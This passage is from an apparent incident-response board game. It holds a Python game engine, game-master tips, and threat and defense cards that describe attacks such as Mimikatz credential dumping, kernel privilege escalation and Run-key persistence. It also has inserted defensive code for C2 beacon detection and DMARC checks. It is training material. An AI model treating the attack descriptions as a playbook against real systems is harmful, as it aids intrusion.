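    revealed: int = 0           # chain[:revealed] are revealed; chain[revealed] is in play
    successes: int = 0          # Investigate successes against the current link (v2.2)
    uncontained: int = 0        # Uncontained Threats Tracker (0/1: a reveal mitigates the prior threat)
    deployed: list = field(default_factory=list)   # vectors of deployed defenses
    result: str = ""            # "", "WIN" or "LOSS"

    @property
    def turn_limit(self):
        return len(self.chain) * 2 + 1              # Core Rules §3a formula

    def current_link(self):
        """Sequential discovery: only the earliest unrevealed card can be targeted."""
        return self.chain[self.revealed] if self.revealed < len(self.chain) else None

    def start_of_turn(self):
        self.turn += 1
        if not self.result and self.turn > self.turn_limit:
            self.result = "LOSS"                    # limit exceeded, cards still hidden
        self.budget -= 5 * self.uncontained         # Uncontained Threats penalty
        if self.current_link() is not None:
            self.budget -= 5                        # Active Breach Cost (v2.2)
        self.budget = max(self.budget, 0)           # Budget floors at 0

    def _act(self, cost):
        """Pay the action's full cost and return (step, vector) of the link in play."""
        if self.result or self.budget < cost:       # unaffordable = the other defeat
            raise ValueError("game over or action unaffordable")
        self.budget -= cost
        return self.current_link()[1:]

    def _bonus(self, vector):
        return 2 if vector in self.deployed else 0  # Deployed Defense Persistence (v2.2)

    def _reveal(self, reward):
        self.revealed, self.successes, self.uncontained = self.revealed + 1, 0, 1
        if reward == "BUDGET_GRANT":                # the other rewards change the hand or
            self.budget += 10                       # the next roll and are not modelled
        if self.current_link() is None:
            self.result = "WIN"                     # checked at once, before any penalty

    def investigate(self, roll, modifiers=0, reward="BUDGET_GRANT"):
        _, vector = self._act(INVESTIGATE_COST)
        if roll + modifiers + self._bonus(vector) < TARGET:
            return "no actionable intelligence"     # failures do not accumulate
        self.successes += 1
        if self.successes == 1:
            return "clue"                           # first success: verbal clue
        self._reveal(reward)                        # second success: card revealed
        return "revealed"

    def deploy_defense(self, tier, vector, step, roll, modifiers=0, reward="BUDGET_GRANT"):
        link_step, link_vector = self._act(TIER_COST[tier])
        if roll + modifiers + self._bonus(link_vector) < TARGET:
            return "defense not deployed"
        self.deployed.append(vector)                # deployed defenses stay on the board
        if vector == link_vector and step == link_step:
            self._reveal(reward)
            return "revealed"
        return "deployed, no reveal"

    def emergency_response(self):
        if not self.uncontained:
            raise ValueError("no revealed, uncontained threat to contain")
        self._act(EMERGENCY_COST)                   # no roll; always succeeds
        self.uncontained = 0

    def score(self):
        return self.revealed / len(self.chain) * 50 + self.budget / 100 * 50


def replay_worked_example():
    """The 3-card budget walkthrough above; returns the game and its budget trace."""
    g = IRGame([("T-01", "INITIAL COMPROMISE", "SOCIAL ENGINEERING"),
                ("T-04", "PIVOT & ESCALATE", "NETWORK"), ("T-10", "C2 & EXFIL", "DATA EXFIL")])
    trace = []
    g.start_of_turn(); trace.append(g.budget)                      # turn 1 start: 95
    g.deploy_defense("BASIC", "SOCIAL ENGINEERING", "INITIAL COMPROMISE", roll=14)
    trace.append(g.budget)                                         # 85 paid, +10 grant = 95
    g.start_of_turn(); trace.append(g.budget)                      # turn 2 start: 85
    g.emergency_response(); trace.append(g.budget)                 # 70
    g.start_of_turn(); trace.append(g.budget)                      # turn 3 start: 65
    return g, trace
```

replay_worked_example() reproduces the budget figures of the walkthrough in the penalty section and leaves the game at the start of turn 3, so a TO can continue it with further investigate() or deploy_defense() calls to see how a chosen line of play ends. Because the engine refuses actions once the budget cannot cover them, a run that hits that ValueError has met the second defeat condition.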

Debrief & Reflection (5-10 minutes)

FOR WINNERS:
  1. "What was your investigation strategy? What worked?"
  2. "Which action type (Investigate vs. Deploy Defense) was most effective for you?"
  3. "Did Uncontained Threats penalties force you to make reactive decisions? Was that realistic?"

FOR LOSERS:
  1. "What went wrong in your investigation? Where did you get stuck?"
  2. "Would you have benefited from more defense deployments vs. investigations?"
  3. "How would you investigate differently if you could replay?"

EVERYONE:
  1. "What was the attacker's complete kill chain?"
  2. "Which threat card was hardest to detect? Why?"
  3. "Why isn't this easy to detect in real-world networks?"
  4. "What tool or process would have helped you detect faster?"


Tips for Threat Orchestrators

Creating Effective Clues

Poor clue (too vague):
- "You find something suspicious"

Too good (gives it away):
- "The attacker used Mimikatz to dump credentials from LSASS memory"

Just right (progressive disclosure):
- "Your memory forensics shows suspicious LSASS process manipulation. A tool has dumped credential hashes from memory. Several cached domain admin credentials have been extracted."

Balancing Difficulty

The game is too easy if:
- Teams reveal all cards in turns 1-4 with budget to spare
- Clues are too specific
- Teams succeed on every roll

The game is too hard if:
- Teams get stuck after revealing 1 card
- No successful rolls for 5+ turns
- Teams hit the turn limit with only 1-2 cards revealed

Adjust by:
- Number of cards (3 vs. 4 vs. 5 — the turn limit scales automatically via (chain × 2) + 1)
- Quality of clues (more/less specific)
- Starting budget (60 vs. 100 vs. 120)
- Turn limit (formula −1 for harder, formula +1 for easier)

Running Multiple Teams

If running this for a tournament or competitive context:
- Assign different attack chains to each team (or same chain for scoring comparison)
- Teams cannot see each other's progress
- First team to reveal all cards wins
- Tiebreaker: Most Budget remaining


Sample Scenarios to Try

Scenario 1: "Startup Breach" (Beginner, 3 cards, 30 min)

  1. T-01: Phishing Campaign
  2. T-06: Mimikatz Credential Dumping
  3. T-10: SQL Database Exfiltration

Focus: Teaching full kill chain detection in 30 minutes

Scenario 2: "Nation-State Campaign" (Intermediate, 4 cards, 40 min)

  1. T-02: Watering Hole Attack
  2. T-04: Lateral Movement via SMB
  3. T-07: Scheduled Task Persistence
  4. T-09: Beaconing to C2 Server

Focus: Sophisticated attack with multiple detection points

Scenario 3: "Advanced Ransomware" (Advanced, 5 cards, 45 min)

  1. T-13: Compromised Software Vendor Update (expansion)
  2. T-04: Lateral Movement via SMB
  3. T-05: Privilege Escalation via Kernel Exploit
  4. T-09: Beaconing to C2 Server
  5. T-11: Ransomware Payload Deployment

Focus: Complex supply-chain-initiated attack chain


Extensions & Variations

Solo Play

Speed Mode

Cooperative vs. Competitive


Next Steps After This Module

If you won:
- Continue to Hardening Module → Build defenses against discovered threats
- Continue to Audit & Compliance Module → Verify your detection methods

If you lost:
- Continue to Disaster Recovery Module → Manage the breach that succeeded
- Replay with a different strategy
- Try a different scenario

Standalone: Play again with a different attack chain


Quick Reference: Action Costs & Outcomes

| Action             | Cost      | Roll                  | Success                                                    | Failure                  |
|--------------------|-----------|-----------------------|------------------------------------------------------------|--------------------------|
| Investigate        | 5 Budget  | roll + modifiers ≥ 11 | 1st success: clue; 2nd success on same link: reveal (v2.2) | No intel (budget wasted) |
| Deploy Defense     | 10/15/25  | roll + modifiers ≥ 11 | Full match reveals card immediately                        | Defense not deployed     |
| Emergency Response | 15 (v2.2) | None                  | Remove revealed threat                                     | n/a (always succeeds)    |

| Modifier | Effect                                                                               |
|----------|--------------------------------------------------------------------------------------|
| +2       | Strong technical justification                                                       |
| +1       | Real tool/technique referenced                                                       |
| +2       | Deployed Defense Persistence: deployed defense's vector matches targeted link (v2.2) |

| Tracker             | Starting | Changes                                                                                                   |
|---------------------|----------|-----------------------------------------------------------------------------------------------------------|
| Budget              | 100      | -5 per uncontained threat + -5 Active Breach Cost while any card is hidden (start of turn, v2.2); floor 0 |
| Turn                | 1        | +1 each turn (limit = chain × 2 + 1)                                                                      |
| Uncontained Threats | 0        | +1 when revealed, -1 when contained or next card revealed                                                 |

For the full list of v2.2 changes and reasoning, see the "v2.2 Playtest Edition Changes" section in Module: Incident Response.


Need Help?


Incident Response Module - Standalone Play Guide
Part of Incident Zero, a modular cybersecurity board game

cards/incident-response/core-deck/threat-defense-cards.md

Incident Zero: Sample Card Sheets

Quick Reference


THREAT CARDS

Attack Chain Steps

Attack Vectors (Countermeasure Keywords)


SAMPLE THREAT CARD DECK (12 Cards)

INITIAL COMPROMISE THREATS

Card T-01: Phishing Campaign

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ PHISHING CAMPAIGN                   │
├─────────────────────────────────────┤
│ Step:    INITIAL COMPROMISE         │
│ Vector:  SOCIAL ENGINEERING         │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Your security team reports that    │
│ several employees have received     │
│ emails claiming to be from your     │
│ IT department requesting password   │
│ resets. One user has already        │
│ clicked the link. Email headers     │
│ show the domain is spoofed."        │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Phishing exploits human psychology  │
│ rather than technical vulnerabilities.│
│ Attackers use social engineering to │
│ create urgency and bypass technical │
│ controls. With email authentication │
│ (DMARC/SPF) and user training, this │
│ attack is highly preventable.       │
└─────────────────────────────────────┘

Card T-02: Watering Hole Attack

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ WATERING HOLE ATTACK                │
├─────────────────────────────────────┤
│ Step:    INITIAL COMPROMISE         │
│ Vector:  WEB EXPLOIT                │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "A popular industry blog your       │
│ employees frequently visit has      │
│ been compromised. Logs show that    │
│ your users' browsers were           │
│ redirected to a malicious domain    │
│ hosting an exploit kit targeting    │
│ unpatched browsers."                │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Watering hole attacks target        │
│ trusted third-party sites to infect │
│ specific user groups. They bypass   │
│ email filters and exploit browser   │
│ vulnerabilities. Defense requires   │
│ rapid patching and endpoint         │
│ monitoring.                         │
└─────────────────────────────────────┘

Card T-03: Compromised Credentials

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ COMPROMISED CREDENTIALS             │
├─────────────────────────────────────┤
│ Step:    INITIAL COMPROMISE         │
│ Vector:  CREDENTIAL ABUSE           │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Your SIEM has detected a           │
│ successful VPN login from an        │
│ unusual geographic location at      │
│ 3 AM. The username belongs to an    │
│ employee who is currently on        │
│ vacation. The login attempt came    │
│ from an IP in a known cybercrime    │
│ hosting provider."                  │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Credential stuffing uses passwords  │
│ leaked from third-party breaches.   │
│ If employees reuse passwords, their │
│ work accounts become compromised.   │
│ Multi-factor authentication (MFA)   │
│ is the primary defense.             │
└─────────────────────────────────────┘

PIVOT & ESCALATE THREATS

Card T-04: Lateral Movement via SMB

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ LATERAL MOVEMENT VIA SMB            │
├─────────────────────────────────────┤
│ Step:    PIVOT & ESCALATE           │
│ Vector:  NETWORK                    │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Network segmentation alerts show   │
│ unusual SMB traffic between a       │
│ compromised workstation and your    │
│ file server. Suspicious named pipe  │
│ activity detected. The attacker     │
│ appears to be enumerating shares    │
│ and attempting to access restricted │
│ resources."                         │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ SMB (Server Message Block) is a     │
│ legitimate protocol, so traffic     │
│ blends in. Flat network architecture│
│ allows attackers to move freely.    │
│ Without micro-segmentation and      │
│ strong authentication, lateral      │
│ movement is easy.                   │
└─────────────────────────────────────┘

Card T-05: Privilege Escalation via Kernel Exploit

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ PRIVILEGE ESCALATION VIA KERNEL     │
├─────────────────────────────────────┤
│ Step:    PIVOT & ESCALATE           │
│ Vector:  MALWARE                    │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "EDR telemetry shows a low-privilege│
│ process loading a proof-of-concept  │
│ exploit for an unpatched local      │
│ privilege escalation vulnerability  │
│ in the Windows kernel. Seconds      │
│ later, the same process spawned a   │
│ child running as SYSTEM. Patch      │
│ reports show this host is three     │
│ months behind on kernel updates."   │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Kernel exploits abuse memory-       │
│ corruption or logic flaws (think    │
│ Dirty Pipe or win32k CVEs) to jump  │
│ from a standard user to SYSTEM or   │
│ root. Public PoC code often appears │
│ within days of disclosure, so       │
│ unpatched hosts are easy targets.   │
│ Rapid patching, EDR behavioral      │
│ detection, and least privilege      │
│ limit the damage.                   │
└─────────────────────────────────────┘

Card T-06: Mimikatz Credential Dumping

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ MIMIKATZ CREDENTIAL DUMPING         │
├─────────────────────────────────────┤
│ Step:    PIVOT & ESCALATE           │
│ Vector:  CREDENTIAL ABUSE           │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Memory forensics analysis on the   │
│ Domain Controller reveals suspicious│
│ LSASS process manipulation. A tool  │
│ has dumped credential hashes from   │
│ memory. Several cached domain admin │
│ credentials have been extracted.    │
│ Attacker now has credentials to     │
│ move to critical systems."          │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Mimikatz attacks Windows LSASS      │
│ (Local Security Authority Subsystem)│
│ memory to extract credentials.      │
│ Without proper Credential Guard and │
│ memory protection, domain admin     │
│ credentials become compromised,     │
│ enabling full infrastructure access.│
└─────────────────────────────────────┘

PERSISTENCE THREATS

Card T-07: Scheduled Task Persistence

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ SCHEDULED TASK PERSISTENCE          │
├─────────────────────────────────────┤
│ Step:    PERSISTENCE                │
│ Vector:  MALWARE                    │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Log analysis shows a scheduled     │
│ task created by the compromised     │
│ account. The task is set to execute │
│ every 6 hours and runs a script     │
│ from a hidden directory. The        │
│ activity occurs outside normal      │
│ business hours. Timestamp metadata  │
│ indicates advanced timestomping."   │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Scheduled tasks run with privileges │
│ of the owner account and survive    │
│ reboots. They blend in with         │
│ legitimate administrative tasks.    │
│ Windows Event Logs may not be       │
│ forwarded centrally, allowing this  │
│ persistence mechanism to hide.      │
└─────────────────────────────────────┘

Card T-08: Registry Run Key Persistence

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ REGISTRY RUN KEY PERSISTENCE        │
├─────────────────────────────────────┤
│ Step:    PERSISTENCE                │
│ Vector:  MALWARE                    │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Registry analysis detects a new    │
│ entry under HKLM\Software\Microsoft\│
│ Windows\CurrentVersion\Run pointing │
│ to an executable in an unusual      │
│ location. The binary has            │
│ obfuscated metadata and a fake      │
│ digital signature. It executes at   │
│ every system startup."              │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Registry Run keys execute at startup│
│ with persistence across reboots.    │
│ They're difficult to distinguish    │
│ from legitimate startup programs.   │
│ Endpoint detection solutions must   │
│ actively monitor registry writes.   │
└─────────────────────────────────────┘

C2 & EXFIL THREATS

Card T-09: Beaconing to C2 Server

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ BEACONING TO C2 SERVER              │
├─────────────────────────────────────┤
│ Step:    C2 & EXFIL                 │
│ Vector:  NETWORK                    │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Your threat intelligence feed      │
│ alerts on suspicious outbound       │
│ HTTPS connections to a domain       │
│ associated with known malware.      │
│ Netflow shows regular 3-minute      │
│ intervals of encrypted traffic.     │
│ The pattern matches documented C2   │
│ beaconing behavior."                │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Beaconing establishes command and   │
│ control communication with the      │
│ attacker's infrastructure. Encrypted│
│ HTTPS makes payload inspection      │
│ difficult. Threat intelligence and  │
│ behavioral analysis (unusual timing)│
│ are required for detection.         │
└─────────────────────────────────────┘
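T-09 makes the point that encrypted C2 traffic is found through behavioral analysis of timing rather than payload inspection. The Python below is an added example, not part of the card deck or of the Incident Zero project: it groups constructed flow records by source and destination and flags pairs whose inter-connection gaps are too regular, which is the "regular 3-minute intervals" pattern the card's clue describes. The records, host names, thresholds (min_connections, max_cv) and function names are this example's own assumptions.

```python
"""Beacon detection from connection timing, as an added example.

Not part of the card deck or the Incident Zero project. T-09 says encrypted C2
traffic is found through behavioral analysis of timing, so this groups flow
records by (source, destination) and flags pairs whose inter-connection gaps are
too regular. Records, hosts and thresholds are constructed for illustration.
"""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed "netflow" records: (epoch seconds, source host, destination).
# 10.0.5.23 checks in with bad.example every ~180 s (jitter of a few seconds);
# 10.0.5.40 is a workstation browsing news.example at irregular, bursty times.
SAMPLE_FLOWS = (
    [(1_700_000_000 + 180 * i + (i % 3) - 1, "10.0.5.23", "bad.example") for i in range(12)]
    + [(1_700_000_000 + t, "10.0.5.40", "news.example")
       for t in (5, 40, 41, 300, 301, 302, 900, 2400, 2407, 3100, 3101, 3250)]
)


def interval_stats(timestamps):
    """(mean gap, population std-dev of gaps) between sorted timestamps, or None."""
    ts = sorted(timestamps)
    gaps = [later - earlier for earlier, later in zip(ts, ts[1:])]
    if len(gaps) < 2:
        return None                      # one gap says nothing about regularity
    return mean(gaps), pstdev(gaps)


def find_beacons(flows, min_connections=8, max_cv=0.1):
    """Return {(src, dst): (mean_gap, cv)} for pairs whose timing looks machine-driven.

    cv is the coefficient of variation (std-dev / mean) of the gaps. A person's
    browsing is bursty (cv well above 1); an implant sleeping a fixed interval,
    even with some jitter, keeps cv small. min_connections avoids scoring tiny samples.
    """
    by_pair = defaultdict(list)
    for ts, src, dst in flows:
        by_pair[(src, dst)].append(ts)
    hits = {}
    for pair, stamps in by_pair.items():
        if len(stamps) < min_connections:
            continue
        stats = interval_stats(stamps)
        if stats is None:
            continue
        avg, sd = stats
        cv = sd / avg if avg > 0 else float("inf")
        if cv <= max_cv:
            hits[pair] = (avg, cv)
    return hits
```

The coefficient of variation is deliberately scale-free, so the same threshold works for a 3-minute and a 3-hour check-in. Implants that randomise their sleep widely will push cv up, so in practice max_cv is tuned against a baseline of known-good traffic, and a hit is a lead for the Investigate step (pivot on the destination against threat intelligence, as the card suggests) rather than a verdict on its own.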

Card T-10: SQL Database Exfiltration

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ SQL DATABASE EXFILTRATION           │
├─────────────────────────────────────┤
│ Step:    C2 & EXFIL                 │
│ Vector:  DATA EXFIL                 │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Database audit logs show a large   │
│ SELECT query executed by a service  │
│ account retrieving customer data.   │
│ Results (500k+ records) were piped  │
│ to a temporary file. System logs    │
│ show this file was copied to cloud  │
│ storage via encrypted connection."  │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Database exfiltration bypasses      │
│ endpoint controls. Attackers use    │
│ legitimate protocols (HTTPS, SFTP)  │
│ to trusted services (S3, Dropbox).  │
│ Without DLP (Data Loss Prevention)  │
│ and egress filtering, detection is  │
│ nearly impossible.                  │
└─────────────────────────────────────┘

Card T-11: Ransomware Payload Deployment

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ RANSOMWARE PAYLOAD DEPLOYMENT       │
├─────────────────────────────────────┤
│ Step:    C2 & EXFIL                 │
│ Vector:  MALWARE                    │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "EDR alerts spike as multiple       │
│ processes begin encrypting files    │
│ on the file server. Hundreds of     │
│ files change extension to '.locked'.│
│ A ransom note appears on all        │
│ administrative workstations. Network│
│ traffic shows exfil before encryption│
│ began (double extortion tactic)."   │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Modern ransomware exfiltrates data  │
│ first (to extort payment), then     │
│ encrypts. Fast detection during the │
│ exfil phase is critical. Once file  │
│ encryption begins, recovery becomes │
│ difficult. Segmentation and backups │
│ are essential.                      │
└─────────────────────────────────────┘

Card T-12: Browser Extension Backdoor

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ BROWSER EXTENSION BACKDOOR          │
├─────────────────────────────────────┤
│ Step:    C2 & EXFIL                 │
│ Vector:  DATA EXFIL                 │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Browser logs show installation of  │
│ a suspicious extension claiming to  │
│ be a productivity tool. Traffic     │
│ analysis reveals the extension is   │
│ capturing keystrokes and session    │
│ cookies. User login credentials for │
│ sensitive portals are being sent to │
│ a server in a high-risk country."   │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Browser extensions run with full    │
│ access to user activity. They can   │
│ capture credentials, intercept      │
│ HTTPS traffic (before encryption),  │
│ and persist across browser updates. │
│ Extension vetting and endpoint      │
│ protection are critical defenses.   │
└─────────────────────────────────────┘

DEFENSE CARDS

Tier System

Countermeasure Vectors

Defense cards counter specific Attack Vectors:
- SOCIAL ENGINEERING
- WEB EXPLOIT
- CREDENTIAL ABUSE
- MALWARE
- NETWORK
- DATA EXFIL


SAMPLE DEFENSE CARD DECK (24 Cards)

Note (v2.2): This deck is identical to cards/hardening/core-deck/defense-cards.md (the two modules share one physical deck). Cards are grouped by tier; card IDs are stable and do not renumber when a card's tier changes, so IDs within a section are not always contiguous. D-18, D-19, D-23, and D-24 were retiered in v2.2, and D-24 is dual-tagged (counts as a match for either listed vector).

BASIC DEFENSES (10 Budget Each)

Card D-01: Email Authentication Setup

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ EMAIL AUTHENTICATION SETUP          │
│ (BASIC - 10 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: SOCIAL ENGINEERING  │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy SPF (Sender Policy           │
│ Framework), DKIM (DomainKeys        │
│ Identified Mail), and DMARC (Domain │
│ Message Authentication, Reporting & │
│ Conformance) to prevent email       │
│ spoofing. Implement enforcement     │
│ policies to reject spoofed emails.  │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Blocks phishing emails claiming to  │
│ be from your domain. Requires       │
│ attackers to find alternative       │
│ vectors. Also provides reporting on │
│ spoofing attempts.                  │
└─────────────────────────────────────┘
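T-01 is caught because "the domain is spoofed", and D-01 is the control that makes that check enforceable: SPF, DKIM and DMARC with a policy that rejects. On the receiving side the mail gateway records its verdicts in an Authentication-Results header (RFC 8601). The Python below is an added example, not code from the Incident Zero project: it parses that header from a few constructed messages and applies the DMARC pass rule (SPF or DKIM must pass and the passing domain must align with the From domain), ignoring any Authentication-Results header that was not stamped by the organisation's own gateway. The messages, the gateway name mx.example.com, the addresses and the function names are this example's own assumptions.

```python
"""Receiving-side SPF/DKIM/DMARC evaluation, as an added example.

Not the project's code. T-01 above is detected because "the domain is spoofed",
and D-01 deploys SPF, DKIM and DMARC with an enforcement policy. On the receiving
side the mail gateway stamps its verdicts into an Authentication-Results header
(RFC 8601); this parses that header and applies DMARC's pass rule (an aligned SPF
or DKIM pass). Messages, host names and addresses are constructed for illustration.
"""
import email
import re
from email.policy import default

TRUSTED_AUTHSERV = "mx.example.com"   # only verdicts stamped by our own gateway count

# Constructed samples: a spoofed "IT department" lure, a legitimate notice, and a
# message with an SPF-only pass that DMARC alignment still accepts.
SPOOFED = """\
From: IT Helpdesk <it-support@example.com>
To: alice@example.com
Subject: Password reset required
Authentication-Results: mx.example.com;
 spf=fail (sender IP is 203.0.113.7) smtp.mailfrom=bulk-mailer.example.net;
 dkim=none;
 dmarc=fail (p=reject) header.from=example.com

Your password expires today. Reset it at the link below.
"""
LEGIT = """\
From: IT Helpdesk <it-support@example.com>
To: alice@example.com
Subject: Scheduled maintenance
Authentication-Results: mx.example.com;
 spf=pass smtp.mailfrom=example.com;
 dkim=pass header.d=example.com;
 dmarc=pass (p=reject) header.from=example.com

The VPN concentrator will be patched Saturday at 02:00.
"""
ALIGNED_SPF_ONLY = """\
From: notifications@example.com
To: alice@example.com
Subject: Ticket updated
Authentication-Results: mx.example.com;
 spf=pass smtp.mailfrom=example.com;
 dkim=none

Your ticket has a new comment.
"""


def auth_results(raw_message, authserv_id=TRUSTED_AUTHSERV):
    """Return {method: (result, properties)} from the trusted Authentication-Results header.

    A sender can add a forged Authentication-Results header of its own, so only the
    one carrying our gateway's authserv-id is honoured (RFC 8601 has the receiving
    MTA remove the ones it did not add).
    """
    msg = email.message_from_string(raw_message, policy=default)
    verdicts = {}
    for header in msg.get_all("Authentication-Results", []):
        parts = [p.strip() for p in " ".join(str(header).split()).split(";")]
        if parts[0] != authserv_id:
            continue
        for stanza in parts[1:]:
            m = re.match(r"(spf|dkim|dmarc)=(\w+)", stanza)
            if m:
                props = dict(re.findall(r"(smtp\.mailfrom|header\.d|header\.from)=(\S+)", stanza))
                verdicts[m.group(1)] = (m.group(2), props)
    return verdicts


def from_domain(raw_message):
    """Domain of the RFC 5322 From header, the identity DMARC aligns against."""
    msg = email.message_from_string(raw_message, policy=default)
    return msg["From"].addresses[0].domain.lower() if msg["From"] else ""


def dmarc_verdict(raw_message):
    """'pass', 'fail' or 'none' (no trusted verdicts at all).

    If the gateway already evaluated DMARC, use its result; otherwise apply the
    DMARC rule by hand: SPF or DKIM must pass AND its domain must match the From domain.
    """
    results = auth_results(raw_message)
    if not results:
        return "none"
    if "dmarc" in results:
        return results["dmarc"][0]
    domain = from_domain(raw_message)
    spf_result, spf_props = results.get("spf", ("none", {}))
    dkim_result, dkim_props = results.get("dkim", ("none", {}))
    spf_aligned = spf_result == "pass" and spf_props.get("smtp.mailfrom", "").lower() == domain
    dkim_aligned = dkim_result == "pass" and dkim_props.get("header.d", "").lower() == domain
    return "pass" if spf_aligned or dkim_aligned else "fail"


def should_reject(raw_message):
    """Enforcement as on D-01: anything that is not a DMARC pass is rejected."""
    return dmarc_verdict(raw_message) != "pass"
```

The spoofed lure fails because SPF fails and the MAIL FROM domain does not even match the displayed From domain, which is exactly the header evidence the T-01 clue refers to. Treating a missing or untrusted verdict as a rejection is the safe default for an enforcing deployment; a monitoring-only rollout (the reporting D-01 mentions) would log the same verdicts without blocking.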

Card D-02: User Security Training

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ USER SECURITY TRAINING              │
│ (BASIC - 10 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: SOCIAL ENGINEERING  │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Conduct phishing awareness training │
│ for all staff. Teach recognition of │
│ suspicious links, sender spoofing,  │
│ urgency tactics, and credential     │
│ harvesting attempts. Run simulated  │
│ phishing campaigns.                 │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Reduces successful phishing rate by │
│ 70-80%. Users become your first     │
│ line of defense. Works best when    │
│ combined with technical controls.   │
└─────────────────────────────────────┘

Card D-03: Windows Update Patching

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ WINDOWS UPDATE PATCHING             │
│ (BASIC - 10 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: WEB EXPLOIT         │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy automated Windows Update     │
│ management across all systems.      │
│ Establish patch deployment timelines│
│ (critical = 48 hours, high = 2      │
│ weeks). Audit compliance with patch │
│ reporting.                          │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Closes browser and kernel           │
│ vulnerabilities. Prevents watering  │
│ hole and exploit kit attacks.       │
│ Should be combined with vulnerability│
│ scanning to identify gaps.          │
└─────────────────────────────────────┘

Card D-04: Network Firewall Rules

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ NETWORK FIREWALL RULES              │
│ (BASIC - 10 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: NETWORK             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy perimeter firewall rules to  │
│ block unauthorized outbound         │
│ protocols. Default-deny for unusual │
│ ports and known malware C2 domains. │
│ Whitelist only necessary business   │
│ traffic.                            │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Prevents early-stage lateral        │
│ movement and C2 beaconing.          │
│ Slows attacker reconnaissance.      │
│ Must be maintained with threat      │
│ intelligence feeds.                 │
└─────────────────────────────────────┘

Card D-05: Log Centralization

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ LOG CENTRALIZATION                  │
│ (BASIC - 10 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy centralized log aggregation  │
│ (syslog, Splunk, ELK). Forward      │
│ Windows Event Logs, firewall logs,  │
│ DNS queries, and proxy logs to      │
│ central SIEM. Configure syslog      │
│ integrity protection.               │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Makes local log tampering difficult.│
│ Provides investigative visibility   │
│ into attacker activities. Foundation│
│ for threat hunting and compliance.  │
└─────────────────────────────────────┘

Card D-06: Basic Antivirus Deployment

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ BASIC ANTIVIRUS DEPLOYMENT          │
│ (BASIC - 10 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy signature-based antivirus    │
│ across all endpoints. Enable        │
│ automatic definition updates        │
│ (daily). Configure real-time file   │
│ and email scanning.                 │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Catches known malware variants.     │
│ Does not detect zero-day or        │
│ polymorphic malware. Useful as part │
│ of defense-in-depth but insufficient│
│ as primary defense.                 │
└─────────────────────────────────────┘

Card D-19: Backup & Disaster Recovery

